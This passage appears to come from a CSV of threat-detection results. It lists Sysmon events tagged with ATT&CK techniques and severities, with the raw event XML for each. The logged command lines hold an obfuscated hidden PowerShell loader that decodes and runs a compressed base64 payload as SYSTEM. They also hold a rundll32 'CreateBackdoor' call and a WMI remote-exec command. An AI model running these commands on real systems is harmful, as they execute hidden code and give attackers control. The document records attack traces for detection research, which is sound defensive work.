e645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA=='))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd())) + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 365ABB72-2586-5CC9-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C + 365ABB72-AF8B-5CC8-0000-0010AC1B1900 + 3872 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell.exe -nop -w hidden -noni -c "if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA==''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1594332367.487274,2020-07-10T02:06:07.487274+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 311382 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-07-09 22:05:55.880 + 747F3D96-94C3-5F07-0000-001080B40100 + 3096 + C:\Windows\System32\cmd.exe + 10.0.17763.592 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + Cmd.Exe + cmd.exe + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-1350-5F08-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 00000000-0000-0000-0000-000000000000 + 628 + ? + ? + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1115] Clipboard Data Collection,1594376435.589722,2020-07-10T14:20:35.589722+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rdpclip.exe ) through command line ( rdpclip ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 311396 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-07-10 10:20:34.877 + 747F3D96-40F2-5F08-0000-0010D8A92C00 + 3304 + C:\Windows\System32\rdpclip.exe + 10.0.17763.1131 (WinBuild.160101.0800) + RDP Clipboard Monitor + Microsoft® Windows® Operating System + Microsoft Corporation + rdpclip.exe + rdpclip + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-94CD-5F07-0000-0020ABBF0300 + 0x3bfab + 1 + Medium + SHA1=0265C1718EC95B025D9719F3B4872826F8F4661F,MD5=9E089ECF8B86983B7A77E3844CD02BB5,SHA256=AF5CAE4B514215E530643A7FEA2D7A47A1B15F6E5610347B217D1ABFA4AE0F92,IMPHASH=E3F33CEBF67721DAC951AFBD20321206 + 747F3D96-1350-5F08-0000-001014C50000 + 824 + C:\Windows\System32\svchost.exe + C:\Windows\System32\svchost.exe -k NetworkService -s TermService + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1085] Rundll32 Execution detected,1584766825.46327,2020-03-21T09:00:25.463270+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 243558 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 05:00:25.452 + 747F3D96-9F69-5E75-0000-001035972000 + 1388 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 windowscoredeviceinfo.dll,CreateBackdoor + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-9DBA-5E75-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-9DBC-5E75-0000-00102C390100 + 1652 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1138] Application Shimming - process,1553028568.168278,2019-03-20T00:49:28.168278+04:00,,Threat,High,"[T1138] Application Shimming - process , please check raw log",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 1966403 + + + + + Microsoft-Windows-Sysmon/Operational + PC01.example.corp + + + + + + 2019-03-19 20:49:28.058 + 365ABB72-55D8-5C91-0000-001060C90700 + 3648 + C:\Windows\System32\sdbinst.exe + 6.0.7600.16385 (win7_rtm.090713-1255) + Application Compatibility Database Installer + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\sdbinst.exe" -q -u "C:\Windows\AppPatch\Test.SDB " + C:\Windows\System32\ + EXAMPLE\user01 + 365ABB72-5417-5C91-0000-002035340300 + 0x33435 + 1 + High + MD5=2996B3E7BBA42BEA62D386D9386EDE97,IMPHASH=87CBEAE39ADA9E96C7F27B94962CD83F + 365ABB72-551C-5C91-0000-001030590500 + 2704 + C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe + "C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe" + +",PC01.example.corp,Microsoft-Windows-Sysmon/Operational +[T1086] PowerShell Process found,1556656012.371714,2019-05-01T00:26:52.371714+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) through command line ( "powershell.exe" -noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String('H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA=='))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd())) )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 9809 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-04-30 20:26:52.356 + 365ABB72-AF8C-5CC8-0000-001003361900 + 2484 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Windows PowerShell + Microsoft® Windows® Operating System + Microsoft Corporation + "powershell.exe" -noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String('H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA=='))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd())) + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 365ABB72-2586-5CC9-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C + 365ABB72-AF8B-5CC8-0000-0010AC1B1900 + 3872 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell.exe -nop -w hidden -noni -c "if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA==''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1564436038.683059,2019-07-30T01:33:58.683059+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c netsh interface portproxy delete v4tov4 listenport=8080 listenaddress=0.0.0.0 ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4949 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:33:58.357 + 747F3D96-6646-5D3F-0000-0010A7398B00 + 3868 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd /c netsh interface portproxy delete v4tov4 listenport=8080 listenaddress=0.0.0.0 + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-6609-5D3F-0000-00109FBF8500 + 1208 + C:\Windows\System32\cmd.exe + "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1602975185.822098,2020-10-18T02:53:05.822098+04:00,,Threat,Low,"Found User (MSEDGEWIN10\Administrator) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /Q /c c:\windows\system32\rundll32.exe c:\programdata\7okjer,#1 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1 )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 421227 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-10-17 22:53:05.776 + 747F3D96-75D1-5F8B-0000-001088C23300 + 2784 + C:\Windows\System32\cmd.exe + 10.0.17763.592 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + Cmd.Exe + cmd.exe /Q /c c:\windows\system32\rundll32.exe c:\programdata\7okjer,#1 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1 + C:\ + MSEDGEWIN10\Administrator + 747F3D96-75D0-5F8B-0000-0020A8A83300 + 0x33a8a8 + 0 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-75D1-5F8B-0000-00101DAB3300 + 2228 + C:\Windows\System32\wbem\WmiPrvSE.exe + C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +Prohibited Process connecting to internet,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Critical,"User (IEWIN7\IEUser) run process C:\Windows\System32\mshta.exe and initiated network connection from hostname ( IEWIN7 and IP ( 10.0.2.16 ) to hostname ( ) , IP ( 10.0.2.17 ) and port ( 55683 )",3," + + + + + 3 + 5 + 4 + 3 + 0 + 0x8000000000000000 + + + 17590 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-14 01:29:00.318 + 365ABB72-19E0-5CDA-0000-001006711000 + 1932 + C:\Windows\System32\mshta.exe + IEWIN7\IEUser + tcp + false + false + 10.0.2.16 + IEWIN7 + 49168 + + false + 10.0.2.17 + + 55683 + + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1047] Windows Management Instrumentation - Process,1602975185.822098,2020-10-18T02:53:05.822098+04:00,,Threat,High,"Found User (MSEDGEWIN10\Administrator) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /Q /c c:\windows\system32\rundll32.exe c:\programdata\7okjer,#1 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1 )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 421227 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-10-17 22:53:05.776 + 747F3D96-75D1-5F8B-0000-001088C23300 + 2784 + C:\Windows\System32\cmd.exe + 10.0.17763.592 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + Cmd.Exe + cmd.exe /Q /c c:\windows\system32\rundll32.exe c:\programdata\7okjer,#1 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1 + C:\ + MSEDGEWIN10\Administrator + 747F3D96-75D0-5F8B-0000-0020A8A83300 + 0x33a8a8 + 0 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-75D1-5F8B-0000-00101DAB3300 + 2228 + C:\Windows\System32\wbem\WmiPrvSE.exe + C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1047] Windows Management Instrumentation - Instances of an Active Script Event Consumer - Process,1602975185.822098,2020-10-18T02:53:05.822098+04:00,,Threat,High,"Found User (MSEDGEWIN10\Administrator) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /Q /c c:\windows\system32\rundll32.exe c:\programdata\7okjer,#1 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1 )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 421227 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-10-17 22:53:05.776 + 747F3D96-75D1-5F8B-0000-001088C23300 + 2784 + C:\Windows\System32\cmd.exe + 10.0.17763.592 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + Cmd.Exe + cmd.exe /Q /c c:\windows\system32\rundll32.exe c:\programdata\7okjer,#1 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1 + C:\ + MSEDGEWIN10\Administrator + 